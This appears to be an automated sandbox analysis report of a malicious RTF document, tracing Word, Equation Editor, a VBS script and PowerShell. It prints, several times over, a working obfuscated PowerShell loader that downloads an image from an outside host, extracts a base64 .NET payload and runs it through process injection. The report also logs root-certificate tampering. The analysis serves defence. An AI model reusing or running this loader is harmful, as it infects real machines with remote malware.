    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: 4YlwTsmpuZ.LNK.0.drLNK file: ..\..\..\..\..\Desktop\4YlwTsmpuZ.rtf
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"Jump to behavior

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03510668
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
